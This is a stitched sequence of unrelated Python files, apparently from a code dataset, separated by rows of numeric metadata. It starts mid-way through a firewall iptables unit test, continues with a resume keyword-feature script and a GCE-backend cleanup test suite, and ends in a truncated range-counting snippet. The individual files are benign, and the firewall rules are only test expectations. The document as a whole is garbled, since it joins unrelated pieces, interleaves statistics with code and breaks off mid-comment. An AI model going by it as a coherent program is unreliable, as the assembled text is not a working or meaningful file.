'67', '-j', CONF.firewall.firewall_chain),
('-F', CONF.firewall.firewall_chain),
('-X', CONF.firewall.firewall_chain),
('-N', CONF.firewall.firewall_chain),
('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', firewall.NEW_CHAIN),
('-F', firewall.NEW_CHAIN),
('-X', firewall.NEW_CHAIN),
('-N', firewall.NEW_CHAIN),
# Blacklist
('-A', firewall.NEW_CHAIN, '-m', 'mac', '--mac-source',
'7c:fe:90:29:24:4f', '-j', 'DROP'),
('-A', firewall.NEW_CHAIN, '-j', 'ACCEPT'),
('-I', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', firewall.NEW_CHAIN),
('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', CONF.firewall.firewall_chain),
('-F', CONF.firewall.firewall_chain),
('-X', CONF.firewall.firewall_chain),
('-E', firewall.NEW_CHAIN, CONF.firewall.firewall_chain)
]
with mock.patch('six.moves.builtins.open', side_effect=IOError()):
firewall.update_filters(mock_get_client)
call_args_list = mock_iptables.call_args_list
for (args, call) in zip(update_filters_expected_args,
call_args_list):
self.assertEqual(args, call[0])
| 43.049438
| 79
| 0.544501
| 2,215
| 19,157
| 4.483973
| 0.11377
| 0.098268
| 0.120822
| 0.151027
| 0.82501
| 0.806383
| 0.787354
| 0.77648
| 0.757652
| 0.740234
| 0
| 0.026133
| 0.294879
| 19,157
| 444
| 80
| 43.146396
| 0.709135
| 0.041865
| 0
| 0.808451
| 0
| 0.008451
| 0.126023
| 0.016858
| 0
| 0
| 0
| 0
| 0.056338
| 1
| 0.033803
| false
| 0
| 0.019718
| 0
| 0.059155
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
389d1ea13b11a72839582de319d9905e3c7d402b
| 10,277
|
py
|
Python
|
src/Manual feature Extraction approch/features.py
|
Bakar31/Hire-The-Perfect-Candidate
|
ab9071eefefbe4d0df10e82dce5707f6c094ebe1
|
[
"Apache-2.0"
] | 2
|
2021-09-10T18:22:39.000Z
|
2021-10-05T18:28:19.000Z
|
src/Manual feature Extraction approch/features.py
|
Bakar31/Hire-The-Perfect-Candidate
|
ab9071eefefbe4d0df10e82dce5707f6c094ebe1
|
[
"Apache-2.0"
] | null | null | null |
src/Manual feature Extraction approch/features.py
|
Bakar31/Hire-The-Perfect-Candidate
|
ab9071eefefbe4d0df10e82dce5707f6c094ebe1
|
[
"Apache-2.0"
] | null | null | null |
import re

from preparing_to_train import train_df, test_df

# Ordered (column, pattern) pairs: one keyword-count feature per resume term.
# Order matters — it fixes the resulting DataFrame column order, matching the
# original hand-written sequence exactly.
# NOTE(review): 'sciKit learn' is the only mixed-case pattern; re.findall is
# case-sensitive, so it may never match lower-cased resumes — verify intent.
_KEYWORD_FEATURES = [
    ('ml_counts', 'machine learning'),
    ('ml_engineer_counts', 'machine learning engineer'),
    ('analytics_counts', 'analytics'),
    ('degree_counts', 'master degree'),
    ('degree_counts_2', 'msc'),
    ('degree_counts_3', 'degree'),
    ('deep_learning_counts', 'deep learning'),
    ('tf_counts', 'tensorflow'),
    ('neural_network_counts', 'neural network'),
    ('nlp_counts', 'natural language processing'),
    ('nlp_counts_2', 'nlp'),
    ('pyspark_counts', 'pyspark'),
    ('hadoop_counts', 'hadoop'),
    ('data_analysis_counts', 'data analysis'),
    ('lustering_counts', 'clustering'),
    ('lr_counts', 'logistic regression'),
    ('classification_counts', 'classification'),
    ('sk_counts', 'sciKit learn'),
    ('pytorch_counts', 'pytorch'),
    ('cnn_counts', 'cnn'),
    ('rnn_counts', 'rnn'),
    ('gans_counts', 'gans'),
    ('nltk_counts', 'nltk'),
    ('spacy_counts', 'spacy'),
    ('transformer_counts', 'transformer'),
    ('django_counts', 'django'),
    ('research_counts', 'researching'),
    ('ai_counts', 'artificial intelligence'),
    ('algorithm_counts', 'algorithm'),
    ('degree_counts_4', 'bachelor degree'),
    ('np_counts', 'numpy'),
    ('pd_counts', 'pandas'),
    ('plt_counts', 'matplotlib'),
    ('sns_counts', 'seaborn'),
    ('keras_counts', 'keras'),
    ('bs_counts', 'beautiful soup'),
    ('bigdata_counts', 'big data'),
    ('ds_counts', 'data science'),
    ('fe_counts', 'feature engineering'),
    ('cv_counts', 'opencv'),
    ('od_counts', 'object detection'),
    ('cvision_counts', 'computer vision'),
    ('MongoDB_counts', 'mongodb'),
    ('NoSQL_counts', 'nosql'),
    ('GraphQL_counts', 'graphql'),
    ('SQL_counts', 'sql'),
    ('Firebase_counts', 'firebase'),
    ('AWS_counts', 'aws'),
    ('Azure_counts', 'azure'),
    ('gcp_counts', 'google cloud platform'),
]


def add_features(df):
    """Add length statistics and keyword-count features to *df* in place.

    Adds ``words_counts``, ``char_counts`` and ``avg_word_len`` from the
    ``resumes`` column, then one count column per entry in
    ``_KEYWORD_FEATURES``. Returns *df* for convenience.
    """
    df['words_counts'] = df['resumes'].apply(lambda x: len(str(x).split()))
    df['char_counts'] = df['resumes'].apply(lambda x: len(str(x)))
    # Bug fix: the original computed test_df's avg_word_len against
    # train_df's word counts; each frame now uses its own columns.
    df['avg_word_len'] = df['char_counts'] / df['words_counts']
    for column, pattern in _KEYWORD_FEATURES:
        # Bind pattern as a default argument to avoid late-binding closures.
        df[column] = df['resumes'].apply(
            lambda x, p=pattern: len(re.findall(p, x)))
    return df


# Build the identical feature set for both splits.
add_features(train_df)
add_features(test_df)

print(train_df.shape)
print(test_df.shape)
| 87.837607
| 117
| 0.718011
| 1,661
| 10,277
| 4.232992
| 0.066225
| 0.109515
| 0.207083
| 0.295833
| 0.828901
| 0.804011
| 0.799033
| 0.790499
| 0.790499
| 0.786517
| 0
| 0.000834
| 0.066848
| 10,277
| 117
| 118
| 87.837607
| 0.732325
| 0.002725
| 0
| 0
| 0
| 0
| 0.304284
| 0.008198
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.018182
| 0
| 0.018182
| 0.018182
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
38a8fe3f1a673cbf3b40b00aa332df49c2d3e1ea
| 29,781
|
py
|
Python
|
appengine/gce-backend/cleanup_test.py
|
Swift1313/luci-py
|
0a4fdfc25f89833026be6a8b29c0a27b8f3c5fc4
|
[
"Apache-2.0"
] | null | null | null |
appengine/gce-backend/cleanup_test.py
|
Swift1313/luci-py
|
0a4fdfc25f89833026be6a8b29c0a27b8f3c5fc4
|
[
"Apache-2.0"
] | null | null | null |
appengine/gce-backend/cleanup_test.py
|
Swift1313/luci-py
|
0a4fdfc25f89833026be6a8b29c0a27b8f3c5fc4
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# Copyright 2016 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
"""Unit tests for cleanup.py."""
import unittest
import test_env
test_env.setup_test_env()
from google.appengine.ext import ndb
from components import net
from test_support import test_case
import cleanup
import instance_group_managers
import instance_templates
import instances
import models
class CheckDeletedInstanceTest(test_case.TestCase):
  """Tests for cleanup.check_deleted_instance."""

  def _put_instance(self, **fields):
    """Stores a models.Instance under a fixed test key, returning the key."""
    return models.Instance(
        key=instances.get_instance_key(
            'base-name', 'revision', 'zone', 'instance-name'),
        **fields
    ).put()

  def test_entity_not_found(self):
    """Ensures nothing happens when the entity is not found."""
    missing = ndb.Key(models.Instance, 'fake-key')
    cleanup.check_deleted_instance(missing)
    self.failIf(missing.get())

  def test_not_pending_deletion(self):
    """Ensures nothing happens when the entity is not pending deletion."""
    key = self._put_instance(url='url')
    cleanup.check_deleted_instance(key)
    self.failIf(key.get().deleted)

  def test_no_url(self):
    """Ensures nothing happens when the entity has no URL."""
    key = self._put_instance(pending_deletion=True)
    cleanup.check_deleted_instance(key)
    self.failIf(key.get().deleted)

  def test_exists(self):
    """Ensures nothing happens when the instance still exists."""
    # A successful (empty) GCE response means the instance is still there.
    self.mock(cleanup.net, 'json_request', lambda *_a, **_kw: {})
    key = self._put_instance(pending_deletion=True, url='url')
    cleanup.check_deleted_instance(key)
    self.failIf(key.get().deleted)

  def test_deleted(self):
    """Ensures the entity is marked deleted when the instance doesn't exist."""
    def raise_not_found(*_args, **_kwargs):
      raise net.NotFoundError('404', 404, '404')
    self.mock(cleanup.net, 'json_request', raise_not_found)
    self.mock(cleanup.metrics, 'send_machine_event', lambda *_a, **_kw: None)
    key = self._put_instance(pending_deletion=True, url='url')
    cleanup.check_deleted_instance(key)
    self.failUnless(key.get().deleted)
class CleanupDeletedInstanceTest(test_case.TestCase):
  """Tests for cleanup.cleanup_deleted_instance."""

  def _put_instance(self, **fields):
    """Stores a models.Instance under a fixed test key, returning the key."""
    return models.Instance(
        key=instances.get_instance_key(
            'base-name', 'revision', 'zone', 'instance-name'),
        **fields
    ).put()

  def test_entity_not_found(self):
    """Ensures nothing happens when the entity is not found."""
    missing = ndb.Key(models.Instance, 'fake-key')
    cleanup.cleanup_deleted_instance(missing)
    self.failIf(missing.get())

  def test_not_deleted(self):
    """Ensures nothing happens when the instance is not deleted."""
    key = self._put_instance(deleted=False)
    cleanup.cleanup_deleted_instance(key)
    self.failUnless(key.get())

  def test_deletes(self):
    """Ensures the entity is deleted."""
    self.mock(cleanup.metrics, 'send_machine_event', lambda *_a, **_kw: None)
    key = self._put_instance(deleted=True)
    cleanup.cleanup_deleted_instance(key)
    self.failIf(key.get())
class CleanupDrainedInstanceTest(test_case.TestCase):
  """Tests for cleanup.cleanup_drained_instance.

  The entity hierarchy exercised here (established by the .parent() chains
  below) is: InstanceTemplate -> InstanceTemplateRevision ->
  InstanceGroupManager -> Instance. An Instance should only be marked
  deleted when its manager is drained, directly or via the grandparent.
  """
  def test_entity_not_found(self):
    """Ensures nothing happens when the entity is not found."""
    # The GCE API must not be contacted for a missing entity.
    def json_request(*_args, **_kwargs):
      self.fail('json_request called')
    self.mock(cleanup.net, 'json_request', json_request)
    key = ndb.Key(models.Instance, 'fake-key')
    cleanup.cleanup_drained_instance(key)
    self.failIf(key.get())
  def test_url_unspecified(self):
    """Ensures nothing happens when the entity has no URL."""
    def json_request(*_args, **_kwargs):
      self.fail('json_request called')
    self.mock(cleanup.net, 'json_request', json_request)
    key = instances.get_instance_key(
        'base-name',
        'revision',
        'zone',
        'instance-name',
    )
    # Full ancestry is stored, but the Instance itself lacks url=...
    key = models.Instance(
        key=key,
        instance_group_manager=instances.get_instance_group_manager_key(key),
    ).put()
    models.InstanceGroupManager(
        key=instances.get_instance_group_manager_key(key),
    ).put()
    models.InstanceTemplateRevision(
        key=instances.get_instance_group_manager_key(key).parent(),
    ).put()
    models.InstanceTemplate(
        key=instances.get_instance_group_manager_key(key).parent().parent(),
    ).put()
    cleanup.cleanup_drained_instance(key)
    self.failIf(key.get().deleted)
  def test_parent_unspecified(self):
    """Ensures nothing happens when the parent doesn't exist."""
    def json_request(*_args, **_kwargs):
      self.fail('json_request called')
    self.mock(cleanup.net, 'json_request', json_request)
    key = instances.get_instance_key(
        'base-name',
        'revision',
        'zone',
        'instance-name',
    )
    # Deliberately no InstanceGroupManager entity (the Instance's parent).
    key = models.Instance(
        key=key,
        instance_group_manager=instances.get_instance_group_manager_key(key),
        url='url',
    ).put()
    models.InstanceTemplateRevision(
        key=instances.get_instance_group_manager_key(key).parent(),
    ).put()
    models.InstanceTemplate(
        key=instances.get_instance_group_manager_key(key).parent().parent(),
    ).put()
    cleanup.cleanup_drained_instance(key)
    self.failIf(key.get().deleted)
  def test_grandparent_unspecified(self):
    """Ensures nothing happens when the grandparent doesn't exist."""
    def json_request(*_args, **_kwargs):
      self.fail('json_request called')
    self.mock(cleanup.net, 'json_request', json_request)
    key = instances.get_instance_key(
        'base-name',
        'revision',
        'zone',
        'instance-name',
    )
    # Deliberately no InstanceTemplateRevision entity (the grandparent).
    key = models.Instance(
        key=key,
        instance_group_manager=instances.get_instance_group_manager_key(key),
        url='url',
    ).put()
    models.InstanceGroupManager(
        key=instances.get_instance_group_manager_key(key),
    ).put()
    models.InstanceTemplate(
        key=instances.get_instance_group_manager_key(key).parent().parent(),
    ).put()
    cleanup.cleanup_drained_instance(key)
    self.failIf(key.get().deleted)
  def test_root_unspecified(self):
    """Ensures nothing happens when the parent doesn't exist."""
    # No json_request mock here: the lookup fails before any API call.
    key = instances.get_instance_key(
        'base-name',
        'revision',
        'zone',
        'instance-name',
    )
    # Deliberately no InstanceTemplate entity (the hierarchy root).
    key = models.Instance(
        key=key,
        instance_group_manager=instances.get_instance_group_manager_key(key),
        url='url',
    ).put()
    models.InstanceGroupManager(
        key=instances.get_instance_group_manager_key(key),
    ).put()
    models.InstanceTemplateRevision(
        key=instances.get_instance_group_manager_key(key).parent(),
    ).put()
    cleanup.cleanup_drained_instance(key)
    self.failIf(key.get().deleted)
  def test_not_drained(self):
    """Ensures nothing happens when the parent is not drained."""
    def json_request(*_args, **_kwargs):
      self.fail('json_request called')
    self.mock(cleanup.net, 'json_request', json_request)
    key = instances.get_instance_key(
        'base-name',
        'revision',
        'zone',
        'instance-name',
    )
    # Complete ancestry, but neither revision nor template drains anything.
    key = models.Instance(
        key=key,
        instance_group_manager=instances.get_instance_group_manager_key(key),
        url='url',
    ).put()
    models.InstanceGroupManager(
        key=instances.get_instance_group_manager_key(key),
    ).put()
    models.InstanceTemplateRevision(
        key=instances.get_instance_group_manager_key(key).parent(),
    ).put()
    models.InstanceTemplate(
        key=instances.get_instance_group_manager_key(key).parent().parent(),
    ).put()
    cleanup.cleanup_drained_instance(key)
    self.failIf(key.get().deleted)
  def test_drained(self):
    """Ensures the entity is marked deleted when the parent is drained."""
    def json_request(*_args, **_kwargs):
      # 404 from GCE: the backing instance is already gone.
      raise net.NotFoundError('404', 404, '404')
    def send_machine_event(*_args, **_kwargs):
      pass
    self.mock(cleanup.net, 'json_request', json_request)
    self.mock(cleanup.metrics, 'send_machine_event', send_machine_event)
    key = instances.get_instance_key(
        'base-name',
        'revision',
        'zone',
        'instance-name',
    )
    key = models.Instance(
        key=key,
        instance_group_manager=instances.get_instance_group_manager_key(key),
        url='url',
    ).put()
    models.InstanceGroupManager(
        key=instances.get_instance_group_manager_key(key),
    ).put()
    # The revision (direct parent of the manager) drains this manager.
    models.InstanceTemplateRevision(
        key=instances.get_instance_group_manager_key(key).parent(),
        drained=[
            instances.get_instance_group_manager_key(key),
        ],
    ).put()
    models.InstanceTemplate(
        key=instances.get_instance_group_manager_key(key).parent().parent(),
    ).put()
    cleanup.cleanup_drained_instance(key)
    self.failUnless(key.get().deleted)
  def test_implicitly_drained(self):
    """Ensures the entity is marked deleted when the grandparent is drained."""
    def json_request(*_args, **_kwargs):
      # 404 from GCE: the backing instance is already gone.
      raise net.NotFoundError('404', 404, '404')
    def send_machine_event(*_args, **_kwargs):
      pass
    self.mock(cleanup.net, 'json_request', json_request)
    self.mock(cleanup.metrics, 'send_machine_event', send_machine_event)
    key = instances.get_instance_key(
        'base-name',
        'revision',
        'zone',
        'instance-name',
    )
    key = models.Instance(
        key=key,
        instance_group_manager=instances.get_instance_group_manager_key(key),
        url='url',
    ).put()
    models.InstanceGroupManager(
        key=instances.get_instance_group_manager_key(key),
    ).put()
    models.InstanceTemplateRevision(
        key=instances.get_instance_group_manager_key(key).parent(),
    ).put()
    # Draining happens at the template (grandparent) level instead.
    models.InstanceTemplate(
        key=instances.get_instance_group_manager_key(key).parent().parent(),
        drained=[
            instances.get_instance_group_manager_key(key).parent(),
        ],
    ).put()
    cleanup.cleanup_drained_instance(key)
    self.failUnless(key.get().deleted)
class CleanupInstanceGroupManagersTest(test_case.TestCase):
  """Tests for cleanup.cleanup_instance_group_managers."""

  def test_no_entities(self):
    """With nothing drained, the delete helper must never be invoked."""
    @ndb.tasklet
    def fail_delete(*_args, **_kwargs):
      self.fail('delete_instance_group_manager called')
    self.mock(
        cleanup.instance_group_managers,
        'get_drained_instance_group_managers',
        lambda *_a, **_kw: [],
    )
    self.mock(cleanup, 'delete_instance_group_manager', fail_delete)

    cleanup.cleanup_instance_group_managers()

    self.failIf(models.InstanceGroupManager.query().count())

  def test_deletes(self):
    """Drained managers are deleted; the undrained one survives."""
    drained = ('fake-key-1', 'fake-key-3', 'fake-key-4')

    @ndb.tasklet
    def delete_manager(key):
      yield key.delete_async()

    self.mock(
        cleanup.instance_group_managers,
        'get_drained_instance_group_managers',
        lambda *_a, **_kw: [
            ndb.Key(models.InstanceGroupManager, name) for name in drained],
    )
    self.mock(cleanup, 'delete_instance_group_manager', delete_manager)

    for i in range(1, 5):
      models.InstanceGroupManager(
          key=ndb.Key(models.InstanceGroupManager, 'fake-key-%d' % i),
      ).put()

    cleanup.cleanup_instance_group_managers(max_concurrent=2)

    self.failIf(ndb.Key(models.InstanceGroupManager, 'fake-key-1').get())
    self.failUnless(ndb.Key(models.InstanceGroupManager, 'fake-key-2').get())
    self.failIf(ndb.Key(models.InstanceGroupManager, 'fake-key-3').get())
    self.failIf(ndb.Key(models.InstanceGroupManager, 'fake-key-4').get())
class CleanupInstanceTemplateRevisionsTest(test_case.TestCase):
  """Tests for cleanup.cleanup_instance_template_revisions."""

  def test_no_entities(self):
    """With nothing drained, the delete helper must never be invoked."""
    @ndb.tasklet
    def fail_delete(*_args, **_kwargs):
      self.fail('delete_instance_template_revision called')
    self.mock(
        cleanup.instance_templates,
        'get_drained_instance_template_revisions',
        lambda *_a, **_kw: [],
    )
    self.mock(cleanup, 'delete_instance_template_revision', fail_delete)

    cleanup.cleanup_instance_template_revisions()

    self.failIf(models.InstanceTemplateRevision.query().count())

  def test_deletes(self):
    """Drained revisions are deleted; the undrained one survives."""
    drained = ('fake-key-1', 'fake-key-3', 'fake-key-4')

    @ndb.tasklet
    def delete_revision(key):
      yield key.delete_async()

    self.mock(
        cleanup.instance_templates,
        'get_drained_instance_template_revisions',
        lambda *_a, **_kw: [
            ndb.Key(models.InstanceTemplateRevision, name)
            for name in drained],
    )
    self.mock(cleanup, 'delete_instance_template_revision', delete_revision)

    for i in range(1, 5):
      models.InstanceTemplateRevision(
          key=ndb.Key(models.InstanceTemplateRevision, 'fake-key-%d' % i),
      ).put()

    cleanup.cleanup_instance_template_revisions(max_concurrent=2)

    self.failIf(ndb.Key(models.InstanceTemplateRevision, 'fake-key-1').get())
    self.failUnless(
        ndb.Key(models.InstanceTemplateRevision, 'fake-key-2').get())
    self.failIf(ndb.Key(models.InstanceTemplateRevision, 'fake-key-3').get())
    self.failIf(ndb.Key(models.InstanceTemplateRevision, 'fake-key-4').get())
class CleanupInstanceTemplatesTest(test_case.TestCase):
  """Tests for cleanup.cleanup_instance_templates."""

  def test_no_entities(self):
    """Ensures no deletion is attempted when nothing exists."""
    @ndb.tasklet
    def fail_on_delete(*_args, **_kwargs):
      self.fail('delete_instance_template called')
    self.mock(cleanup, 'delete_instance_template', fail_on_delete)

    cleanup.cleanup_instance_templates()

    self.failIf(models.InstanceTemplate.query().count())

  def test_deletes(self):
    """Ensures all InstanceTemplates are deleted."""
    @ndb.tasklet
    def delete_key(key):
      yield key.delete_async()
    self.mock(cleanup, 'delete_instance_template', delete_key)
    for suffix in ('1', '2', '3'):
      models.InstanceTemplate(
          key=ndb.Key(models.InstanceTemplate, 'fake-key-%s' % suffix),
      ).put()

    cleanup.cleanup_instance_templates(max_concurrent=2)

    for suffix in ('1', '2', '3'):
      self.failIf(
          ndb.Key(models.InstanceTemplate, 'fake-key-%s' % suffix).get())
class DeleteInstanceGroupManagerTest(test_case.TestCase):
  """Tests for cleanup.delete_instance_group_manager."""

  @staticmethod
  def _create_entity(**kwargs):
    """Stores an InstanceGroupManager with a well-known key, returns key."""
    return models.InstanceGroupManager(
        key=instance_group_managers.get_instance_group_manager_key(
            'base-name', 'revision', 'zone'),
        **kwargs
    ).put()

  @staticmethod
  def _delete(key):
    """Runs cleanup.delete_instance_group_manager to completion."""
    cleanup.delete_instance_group_manager(key).wait()

  def test_entity_not_found(self):
    """Ensures nothing happens when the entity is not found."""
    key = ndb.Key(models.InstanceGroupManager, 'fake-key')
    self._delete(key)
    self.failIf(key.get())

  def test_url_specified(self):
    """Ensures nothing happens when the entity still has a URL."""
    key = self._create_entity(url='url')
    models.InstanceTemplateRevision(key=key.parent(), drained=[key]).put()
    models.InstanceTemplate(
        key=key.parent().parent(), active=key.parent()).put()
    self._delete(key)
    self.failUnless(key.get())

  def test_active_instances(self):
    """Ensures nothing happens when there are active Instances."""
    key = self._create_entity(instances=[ndb.Key(models.Instance, 'fake-key')])
    models.InstanceTemplateRevision(key=key.parent(), drained=[key]).put()
    models.InstanceTemplate(
        key=key.parent().parent(), active=key.parent()).put()
    self._delete(key)
    self.failUnless(key.get())

  def test_parent_doesnt_exist(self):
    """Ensures nothing happens when the parent doesn't exist."""
    key = self._create_entity()
    models.InstanceTemplate(
        key=key.parent().parent(), active=key.parent()).put()
    self._delete(key)
    self.failUnless(key.get())

  def test_root_doesnt_exist(self):
    """Ensures nothing happens when the root doesn't exist."""
    key = self._create_entity()
    models.InstanceTemplateRevision(key=key.parent(), drained=[key]).put()
    self._delete(key)
    self.failUnless(key.get())

  def test_active(self):
    """Ensures nothing happens when the entity is active."""
    key = self._create_entity()
    models.InstanceTemplateRevision(key=key.parent(), active=[key]).put()
    models.InstanceTemplate(
        key=key.parent().parent(), active=key.parent()).put()
    self._delete(key)
    self.failUnless(key.get())

  def test_deletes_drained(self):
    """Ensures a drained entity is deleted and removed from its parent."""
    key = self._create_entity()
    siblings = [
        ndb.Key(models.InstanceGroupManager, 'fake-key-1'),
        ndb.Key(models.InstanceGroupManager, 'fake-key-2'),
    ]
    models.InstanceTemplateRevision(
        key=key.parent(),
        drained=[siblings[0], key, siblings[1]],
    ).put()
    models.InstanceTemplate(
        key=key.parent().parent(), active=key.parent()).put()

    self._delete(key)

    self.failIf(key.get())
    # Only the unrelated sibling keys remain in the parent's drained list.
    self.assertItemsEqual(key.parent().get().drained, siblings)

  def test_deletes_implicitly_drained(self):
    """Ensures an implicitly drained entity is deleted.

    Implicitly drained: active in its parent revision while the revision
    itself is drained in the root template.
    """
    key = self._create_entity()
    siblings = [
        ndb.Key(models.InstanceGroupManager, 'fake-key-1'),
        ndb.Key(models.InstanceGroupManager, 'fake-key-2'),
    ]
    models.InstanceTemplateRevision(
        key=key.parent(),
        active=[siblings[0], key, siblings[1]],
    ).put()
    models.InstanceTemplate(
        key=key.parent().parent(), drained=[key.parent()]).put()

    self._delete(key)

    self.failIf(key.get())
    self.assertItemsEqual(key.parent().get().active, siblings)
class DeleteInstanceTemplateTest(test_case.TestCase):
  """Tests for cleanup.delete_instance_template."""

  @staticmethod
  def _delete(key):
    """Runs cleanup.delete_instance_template to completion."""
    cleanup.delete_instance_template(key).wait()

  def test_entity_not_found(self):
    """Ensures nothing happens when the entity is not found."""
    key = ndb.Key(models.InstanceTemplate, 'fake-key')
    self._delete(key)
    self.failIf(key.get())

  def test_active_instance_template_revisions(self):
    """Ensures nothing happens when a revision is still active."""
    key = models.InstanceTemplate(
        active=ndb.Key(models.InstanceTemplateRevision, 'fake-key'),
    ).put()
    self._delete(key)
    self.failUnless(key.get())

  def test_drained_instance_template_revisions(self):
    """Ensures nothing happens when revisions are still drained."""
    key = models.InstanceTemplate(
        drained=[ndb.Key(models.InstanceTemplateRevision, 'fake-key')],
    ).put()
    self._delete(key)
    self.failUnless(key.get())

  def test_deletes(self):
    """Ensures an entity with no revisions is deleted."""
    key = models.InstanceTemplate().put()
    self._delete(key)
    self.failIf(key.get())
class DeleteInstanceTemplateRevisionTest(test_case.TestCase):
  """Tests for cleanup.delete_instance_template_revision."""

  @staticmethod
  def _create_entity(**kwargs):
    """Stores an InstanceTemplateRevision with a well-known key."""
    return models.InstanceTemplateRevision(
        key=instance_templates.get_instance_template_revision_key(
            'base-name', 'revision'),
        **kwargs
    ).put()

  @staticmethod
  def _delete(key):
    """Runs cleanup.delete_instance_template_revision to completion."""
    cleanup.delete_instance_template_revision(key).wait()

  def test_entity_not_found(self):
    """Ensures nothing happens when the entity is not found."""
    key = ndb.Key(models.InstanceTemplateRevision, 'fake-key')
    self._delete(key)
    self.failIf(key.get())

  def test_url_specified(self):
    """Ensures nothing happens when the entity still has a URL."""
    key = self._create_entity(url='url')
    models.InstanceTemplate(key=key.parent(), drained=[key]).put()
    self._delete(key)
    self.failUnless(key.get())

  def test_active_instance_group_managers(self):
    """Ensures nothing happens with active InstanceGroupManagers."""
    key = self._create_entity(
        active=[ndb.Key(models.InstanceGroupManager, 'fake-key')])
    models.InstanceTemplate(key=key.parent(), drained=[key]).put()
    self._delete(key)
    self.failUnless(key.get())

  def test_drained_instance_group_managers(self):
    """Ensures nothing happens with drained InstanceGroupManagers."""
    key = self._create_entity(
        drained=[ndb.Key(models.InstanceGroupManager, 'fake-key')])
    models.InstanceTemplate(key=key.parent(), drained=[key]).put()
    self._delete(key)
    self.failUnless(key.get())

  def test_parent_doesnt_exist(self):
    """Ensures nothing happens when the parent doesn't exist."""
    key = self._create_entity()
    self._delete(key)
    self.failUnless(key.get())

  def test_active(self):
    """Ensures nothing happens when the entity is active."""
    key = self._create_entity()
    models.InstanceTemplate(key=key.parent(), active=key).put()
    self._delete(key)
    self.failUnless(key.get())

  def test_deletes(self):
    """Ensures a drained entity is deleted and removed from its parent."""
    key = self._create_entity()
    siblings = [
        ndb.Key(models.InstanceTemplateRevision, 'fake-key-1'),
        ndb.Key(models.InstanceTemplateRevision, 'fake-key-2'),
    ]
    models.InstanceTemplate(
        key=key.parent(),
        drained=[siblings[0], key, siblings[1]],
    ).put()

    self._delete(key)

    self.failIf(key.get())
    # Only the unrelated sibling keys remain in the parent's drained list.
    self.assertItemsEqual(key.parent().get().drained, siblings)
class ExistsTest(test_case.TestCase):
  """Tests for cleanup.exists."""

  def test_exists(self):
    """Ensures an existing resource is detected."""
    self.mock(cleanup.net, 'json_request', lambda *_args, **_kwargs: {})
    self.failUnless(cleanup.exists('instance'))

  def test_not_found(self):
    """Ensures a non-existent resource is detected via 404."""
    def raise_not_found(*_args, **_kwargs):
      raise net.NotFoundError('404', 404, '404')
    self.mock(cleanup.net, 'json_request', raise_not_found)
    self.failIf(cleanup.exists('instance'))

  def test_error(self):
    """Ensures non-404 errors are surfaced to the caller."""
    def raise_auth_error(*_args, **_kwargs):
      raise net.AuthError('403', 403, '403')
    self.mock(cleanup.net, 'json_request', raise_auth_error)
    self.assertRaises(net.AuthError, cleanup.exists, 'instance')
class SetInstanceDeletedTest(test_case.TestCase):
  """Tests for cleanup.set_instance_deleted."""

  @staticmethod
  def _create_instance(pending_deletion):
    """Stores an Instance with a well-known key, returns its key."""
    return models.Instance(
        key=instances.get_instance_key(
            'base-name', 'revision', 'zone', 'instance-name'),
        pending_deletion=pending_deletion,
    ).put()

  def test_entity_not_found(self):
    """Ensures nothing happens when the entity is not found."""
    key = ndb.Key(models.Instance, 'fake-key')
    cleanup.set_instance_deleted(key, False)
    self.failIf(key.get())

  def test_not_drained_or_pending_deletion(self):
    """Ensures nothing happens when neither drained nor pending deletion."""
    key = self._create_instance(pending_deletion=False)
    cleanup.set_instance_deleted(key, False)
    self.failIf(key.get().deleted)

  def test_drained(self):
    """Ensures the entity is marked as deleted when drained."""
    key = self._create_instance(pending_deletion=False)
    cleanup.set_instance_deleted(key, True)
    self.failUnless(key.get().deleted)

  def test_pending_deletion(self):
    """Ensures the entity is marked as deleted when pending deletion."""
    key = self._create_instance(pending_deletion=True)
    cleanup.set_instance_deleted(key, False)
    self.failUnless(key.get().deleted)
# Run the full test suite when this module is executed directly.
if __name__ == '__main__':
  unittest.main()
| 28.913592
| 80
| 0.652463
| 3,291
| 29,781
| 5.682163
| 0.051656
| 0.040428
| 0.060963
| 0.052888
| 0.913583
| 0.896203
| 0.883957
| 0.837701
| 0.793262
| 0.715455
| 0
| 0.004064
| 0.22333
| 29,781
| 1,029
| 81
| 28.941691
| 0.80441
| 0.100534
| 0
| 0.83522
| 0
| 0
| 0.080036
| 0.015313
| 0
| 0
| 0
| 0
| 0.005031
| 1
| 0.093082
| false
| 0.005031
| 0.012579
| 0.007547
| 0.127044
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
38d363491b8c53a3dc9953105a2b7f03652007bd
| 775
|
py
|
Python
|
range_1.py
|
Krishna-Aaseri/Python_Logical_Questions
|
c0f025a56dbbf85426142adb423b25fa7b034adb
|
[
"MIT"
] | null | null | null |
range_1.py
|
Krishna-Aaseri/Python_Logical_Questions
|
c0f025a56dbbf85426142adb423b25fa7b034adb
|
[
"MIT"
] | null | null | null |
range_1.py
|
Krishna-Aaseri/Python_Logical_Questions
|
c0f025a56dbbf85426142adb423b25fa7b034adb
|
[
"MIT"
] | null | null | null |
# Count how many elements of a list fall within a given range.
#
# Input : [10, 20, 30, 40, 50, 40, 40, 60, 70] range: 10-40
#
